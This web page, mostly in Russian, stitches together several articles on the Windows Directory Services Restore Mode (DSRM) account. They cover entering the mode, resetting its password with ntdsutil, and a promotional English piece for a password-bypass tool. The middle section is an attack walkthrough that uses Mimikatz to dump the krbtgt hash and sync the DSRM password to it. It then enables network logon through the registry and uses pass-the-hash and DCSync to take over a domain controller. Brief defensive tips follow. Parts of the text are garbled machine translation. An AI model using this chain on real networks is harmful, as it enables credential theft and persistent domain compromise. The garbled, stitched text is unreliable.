Dsrm password что это
Перейти к содержимому

Dsrm password что это

  • автор:

Вход в DSRM режим на контроллере домена Windows Server 2012

date08.06.2022
useritpro
directoryWindows Server 2012
commentsкомментариев 5

Несмотря на то, что в службе каталогов существует специальная корзина, куда попадают все удаленные объекты (Active Directory Recycle Bin), все-таки часть объектов AD при удалении из базы AD удаляются полностью, минуя корзину, и для их восстановления придется запускать процедуру восстановления базы AD в режиме восстановления службы каталогов DSRM (Directory Services Restore Mode).

Режим восстановления службы каталогов (Directory Services Restore Mode) специальный режим загрузки операционной системы Windows, выполняющей функции контролера домена AD (данный режим загрузки появился еще в Windows 2000). Данный режим предназначен для выполнения операции восстановления службы каталогов Active Directory, в случаях: когда база Active Directory повреждена и нуждается в исправлении, обслуживания базы AD (сжатие файла базы данных AD, анализ базы на наличие ошибок), отката на резервную копию AD, восстановлению отдельного объекта или сброса пароля администратора домена. По сути, режим DSRM – это безопасный режим работы контроллера домена Windows.

Чтобы попасть в режим восстановления службы каталогов, необходимо при загрузке сервера нажать клавишу F8, попав таким образом в экран расширенных параметров загрузки (Advanced Boot Options) в котором необходимо выбрать опцию Directory Services Restore Mode (Windows domain controllers only). От версии к версии Windows Server Microsoft меняла способ входа в режим DSRM. Так, например, в Windows Server 2008/ 2008 R2 данный пункт в меню параметров загрузки ОС по-умолчанию отсутствовал, и чтобы добавить эту опцию в меню загрузки, необходимо было в системе выполнить команду

и перезагрузиться. Отключить пункт «Directory Services Restore Mode» в Windows Server 2008 / R2 можно было с помощью команды

В новой серверной ОС Windows Server 2012 Microsoft вновь изменила процедуру входа в режим восстановления службы каталогов (DSRM).

Попасть в режим Directory Services Restore Mode из Windows Server 2012 можно двумя способами:

    В командной строке с правами администратора выполните команду

Режим восстановления контроллера домена в windows 2012 server

После чего система перезагрузится, и после запуска автоматически откроется экран параметром загрузки Advanced Boot Options, среди вариантов загрузки будет искомый Directory Services Repair Mode

Загрузочное меню troubleshoot в Windows 2012

После перезагрузки вместо стандартной экрана загрузки сервера появится следующее меню:

Выберите Troubleshoot-> Advanced options->Startup Settings
Расширенное меню загрузки Windows Server 2012
Нажмите Restart
Перезагрузка windows
После следующей перезагрузки сервера появится «классический» экран выбора параметров загрузки ОС (Advanced Boot Options), в котором необходимо выбрать искомый Directory Services Repair Mode.
Как в Windows Server 2012 попасть в Directory Services Repair Mode

Затем нужно будет указать пароль для режима восстановления каталогов и вуаля – мы попали на контроллер домена с отключенной службой каталога и можно приступать к восстановлению базы AD.

Предыдущая статьяПредыдущая статья Следующая статья Следующая статья

Русские Блоги

1.DSRM (режим восстановления сервиса Diretcory, режим восстановления службы каталога) — это опция запуска режима безопасности для контроллера домена в среде домена Windows. Локальная учетная запись администратора контроллера домена также является учетной записью DSRM. Пароль DSRM устанавливается при создании постоянного тока, которое обычно редко меняется. Использование DSRM заключается в том, что администратор разрешается восстановить, восстановить и восстановить базу данных Active Directory, когда среда домена неисправен. Вы можете изменить пароль DSRM, запустив инструмент NTDSUTIL на DC.

2. Метод модификации паролей DSRM

Откройте среду командной строки на контроллере домена, введите «ntdsutil», общие команды следующие:

Set DSRM Пароль: Установите пароль DSRM

Сброс пароля на сервере NULL: восстановить пароли DSRM на текущем контроллере домена

Если версия контроллера домена является Windows2008 (установлена ​​KB961320) и выше, пароль DSRM можно синхронизировать как существующий пароль пользователя домена.

Ntdsutil # открыть командную строку

set dsrm password

Синхронизация от учетной записи домена Domain Domainusername # синхронизирует пароль DSRM и пароль указанного домена пользователя.

Во-вторых. Экспериментальная операция

(1) Используйте Mimikatz для просмотра хэша NTLM KRBTGT

Откройте мимикац в контроллере домена, см. Хеш CrbTGT NTLM: FFC79C6F14BB2C39E6CEAB183CEFC9C5

lsadump::lsa /patch /name:krbtgt

mimikatz privilege::debug "lsadump::lsa /patch /name:krbtgt" > krbtgt.txt

(2) хэш NTLM локального администратора (DSRM) в файле SAM с использованием Mimikatz

Откройте мимикац в контроллере домена, чтобы получить хэш NTLM счета DSRM: 579DA618CFBFA85247ACF1F800A280A4

(3) Синхронизировать учетную запись DSRM и хеш CRBTGT NTLM

set dsrm password

sync from Domain Account krbtgt

(4) Просмотр, является ли хэш NTLM DSRM успешным

Получите хэш NTLM счета DSRM MIMIKATZ: FFC79C6F14BB2C39E6CEAB183CEFC9C5

mimikatz privilege::debug token::elevate lsadump::sam

(5) Изменить метод входа в систему DSRM

В реестре Создайте новый HKLM: \ System \ CurrentControlset \ Control \ lsa \ dsrmadminlogonbehavior.

Трехсторонние логины DSRM:

0: значение по умолчанию можно использовать только при перезагрузке контроллера домена и входит в режим DSRM.

1: Вы можете войти в контроллер домена, используя учетную запись администратора DSRM, только если локальная служба AD и DS останавливается.

2: В любом случае, вы можете войти в контроллер домена, используя учетную запись администратора DSRM.

В операционной системе после Windows Server 2000 DSRM использует контроллер домена входа в систему консоли для ограничения.

Если вы хотите использовать учетную запись DSRM, чтобы войти в контроллер домена по сети, вам нужно установить это значение 2 и может быть изменено с PowerShell.

New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" -name "DsrmAdminLogonBehavior" -value 2 -PropertyType DWORD

Просмотр реестра и обнаружил, что значение ключа DSRMADMINLOGONBEHAVIORBEHAVIER было установлено на 2.

(6) Использование учетной записи DSRM через сетевой дистанционный контроллер домена входа

Используйте Mimikatz для передачи HASH доставки, откройте Mimikatz в режиме администратора машины-члена домена, введите следующую команду:

sekurlsa::pth /domain:DC /user:administrator /ntlm:ffc79c6f14bb2c39e6ceab183cefc9c5

(7) NTLM HASHH, который удаленно выброшен с функцией DCSync Mimikatz.

После завершения HASH доставки появится окно командной строки и открывает Mimikatz в окне командной строки. Введите следующую команду:

mimikatz "lsadump::dcsync /domain:payload.com /dc:win-dc /user:krbtgt"

Необходимо обратить внимание на путь: новое окно находится в System32, вам нужно переключиться в операцию каталога, где находится Mimikatz.

В-третьих, DSRM изменил меры защиты

1. Регулярно проверяйте значение ключевой стоимости HKLM \ System \ CurectControlset \ System \ lsa \ dsrmadminlogonbehavior для управления режимом входа в систему DSRM, подтверждая, что значение ключа равно 1 или удалите значение ключа.

2. Регулярно измените учетную запись DSRM всех контроллеров домена в домене.

3. Регулярные журналы для ID 4794 часто проверяют пароль администратора, которые пытаются установить режим восстановления службы Active Directory, будет записан в проблеме 4794.

Как войти на контроллер домена с локальной учетной записью

Войти с локальной учетной записью на контроллер домена в принципе невозможно, поскольку при повышении сервера до контроллера домена локальная база учетных записей становится недоступной. Однако из этого правила есть одно исключение.

На случай неисправности службы каталогов на контроллерах домена есть специальный режим загрузки Directory Services Restore Mode (DSRM). В этом режиме служба каталогов не запускаются, а база данных AD переводится в автономный режим. Для входа в этом режиме используется специальная учетная запись администратора DSRM, которая и является единственной локальной учетной записью на контроллере домена. В связи с этим возникает два вопроса.

Как узнать пароль DSRM

Пароль DSRM указывается в процессе развертывания контроллера домена.

ввод пароля для учетной записи DSRM

Впрочем, запоминать или записывать пароль вовсе не обязательно, при необходимости его легко можно сбросить с помощью утилиты ntdsutil. Для сброса пароля DSRM необходимо зайти на контроллер домена и выполнить команды:

ntdsutil
set dsrm password
reset password on server NULL
новый пароль
подтверждение пароля
quit
quit

сброс пароля DSRM

С выходом SP2 для Windows Server 2008 появился еще один способ сбросить пароль DSRM-админа — синхронизировать его с паролем доменной учетной записи. Для синхронизации можно выбрать любого пользователя, либо создать нового.

Для примера я создал пользователя Dsrmadmin.

учетная запись для синхронизации с DSRM

Для синхронизации опять же заходим на контроллер домена и выполняем команды:

ntdsutil
set dsrm password
sync from domain account dsrmadmin
quit
quit

Либо то же самое одной строкой:

ntdsutil ″set dsrm password″ ″sync from domain account dsrmadmin″ q q

синхронизация учетной записи DSRM с доменной учетной записью

После этого можем заходить на контроллер домена, используя пароль от доменной учетной записи. Стоит уточнить, что процедура синхронизации не обеспечивает отслеживание изменений и постоянное соответствие паролей. Для регулярной синхронизации придется придумывать что либо, например добавить команду синхронизации в Startup Scripts, либо создать задание в планировщике.

Можно ли войти под DSRM администратором в обычном режиме

В предыдущих версиях Windows DSRM администратор мог осуществить локальный вход на контроллер домена только загрузившись в режиме DSRM. Начиная с Windows Server 2008 службы AD могут быть остановлены из оснастки Services, без необходимости перезагрузки. Соответственно у DSRM администратора теперь есть возможность подключиться к контроллеру домена и в обычном (не DSRM) режиме.

Активировать эту возможность можно с помощью правки реестра на контроллере домена. Для изменения отвечает параметр типа DWORD с названием DsrmAdminLogonBehavior, находящийся в разделе HKLM\System\CurrentControlSet\Control\Lsa. Он может иметь значения:

0 — DSRM администратор может войти в систему только в режиме DSRM. Это значение по умолчанию;
1 — DSRM администратор может войти в систему при остановленной службе AD DS;
2 — DSRM администратор может зайти на контроллер домена в любое время.

Установить необходимое значение можно с помощью утилиты reg.exe, запущенной из командной строки с правами администратора. Для примера установим для параметра значение, равное 1:

REG ADD ″HKLM\System\CurrentControlSet\Control\Lsa″ /v DsrmAdminLogonBehavior /t REG_DWORD /d 1 /F

настройка параметров входа для учетной записи DSRM с помощью reg.exe

Либо с помощью PowerShell, например так зададим для параметра значение 2:

New-ItemProperty -Name DsrmAdminLogonBehavior -Path HKLM:\System\CurrentControlSet\Control\Lsa -PropertyType Dword -Value 2 -Force

настройка параметров входа для учетной записи DSRM

В заключение напомню, что разрешать локальный вход на контроллере домена без особой необходимости не стоит, так как это снижает безопасность.

Resetting DSRM Password in Windows Server 2019/2016/2012 (R2)

April Ashley

Schedules maintenance of any network or IT infrastructure is an inevitable task. Domain controllers and administrators use DSRM to take the system offline for any type of database updates and maintenance. The password for DSRM provides a backdoor for the administrators to make edits in the database. But to reset the DSRM password, you may have to face some challenges. In case you don’t have access to the valid details, here are some methods that you can use for the password for directory services restore mode.

What is Directory Services Restore Mode?

The DSRM (Directory Services Restore Mode) is a low-level administrative mode of Windows that allows administrators to access the system even without logging on to the system. It is like an administrator-level look at the Windows registry. You can use this mode to restore any data or update it.

The directory services restore mode password is used in conjunction with the startup key, and it provides emergency access to change data and reloads different parts of your system. The password protection of DSRM ensures that no unauthorized attempts can be made. Forgetting the password can cause trouble for you, but here are some proven ways to reset DSRM password server 2016.

How to Reset Directory Services Restore Mode Password?

There are different options available on how to reset the DSRM password. It depends on the platform you are using. The steps are different according to the OS version you are using. Let’s get started with some common ways that will surely get your problem solved.

Way 1. Using UnlockGo – Windows Password Recovery

The first way to reset the password that you must use is UnlockGo (Windows). This tool is specially designed to provide a safe and secure way of accessing your system. It works with any domain controller and allows administrators to reset Windows passwords in the case of an emergency and make some changes in the database. Here are some features of UnlockGo for windows that can help the users in these situations:

  • Create Windows reset disk for password.
  • Reset/Remove Windows Local, Admin, Domain, Microsoft accounts passwords.
  • Create/Delete Local Admin, Domain Admin, Guest Accounts.
  • Works fine for almost all Windows versions (from 11 to XP) and Windows Server.

These features allow the administrator and users to bypass different security measurements. Here are some simple steps that you need to follow to create a Windows password reset disk with UnlockGo for windows:

Step 1: Install the tool

You can use any other laptop or computer to install UnlockGo for windows and then load the program to let the tool download the data package.

reset dsrm password

Step 2: Insert reset disk or USB

Depending upon your needs and requirements, you can use a disk or USB to create the reset disk. You need to select the right option and then click on the Next button.

reset dsrm password server 2012 r2

Step 3: Boot the Locked PC from the Burned Reset Disk

Once you have successfully connected the USB, start the burning process. Once the process is complete, insert the reset disk into the system where you want to reset the DSRM password server 2012 r2. Follow the simple instructions given on the screen and reset the password.

directory services restore mode reset domain administrator password

Step 4: Reset Windows Password

After choose the windows system, you can see the interface to reset your windows password. After resetting it, reboot your locked PC and enter the new password, you can get access into the computer again.

how to reset dsrm password

Way 2: Using Ntdsutil

Another method that you can use is to use Ntdsutil. This is a command-line tool available in Windows, which is used to perform database operations. The DSRM password is encrypted and stored in the system registry. Here’re the steps for directory services restore mode reset domain administrator password with Ntdsutil:

Ntdsutil works for windows server more advanced versions after 2003.

    Access the command prompt on the infected system and type ntdsutil.

dsrm reset domain admin password

reset dsrm password server 2016

After exiting the console, administrators can use the new password to access Directory Services Restore Mode. But if you don’t have access to the system password, then you will have to reset the Windows password first with the help of UnlockGo for Windows.

How to Enter Directory Services Restore Mode?

To recover the active directory, you can use different options to boot DSRM mode. Users need to understand that the safe mode is different from the DSRM mode and the purposes of these two modes are different. So, let’s have a look at some ways that you can use to enter DSRM mode.

Way 1. Pressing F8 Key

After the BIOS screen, keep pressing the F8 key on the startup and make sure to do it before the Windows logo appears. Once the menu appears, use the arrow keys to choose Directory Services Restore Mode or DS Reset Mode.

reset dsrm password on windows server

Way 2: Using msconfig.exe

Here are the simple steps to follow:

  • Press Win+R and type msconfig in the dialogue box, and the system settings will appear.
  • Click on Boot and choose Safe Boot under Boot Options.
  • Choose Active Directory repair and click on OK.
  • Reboot the computer, and the system will take you to DSRM mode.

reset dsrm password windows server 2012 r2

Way 3: Running bcdedit

For Windows Server 2008, bcdedit command can be run. Follow the given steps:

  • Type bcdedit /set safeboot dsrepair and reboot the system.
  • On the normal boot, type bcdedit /deletevalue safeboot.

how to reset dsrm domain admin password

This method is suitable for situations where GUI or graphical user interface is not available.

Final Thoughts

The directory services restore mode password is used in conjunction with the startup key, and it provides an emergency access to change data and reloads different parts of your system. The directory services restore mode password is used in conjunction with the startup key. Or you can try resetting it with the help of this post.

You will realize that all the methods have some limitations to reset DSRM password. On the other, UnlockGo – Windows Password Recovery not only helps to reset the DSRM password, but you can create or delete different types of accounts too. When you are stuck with a forgotten password situation, give it a try and enjoy the seamless experience to overcome different security restrictions.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *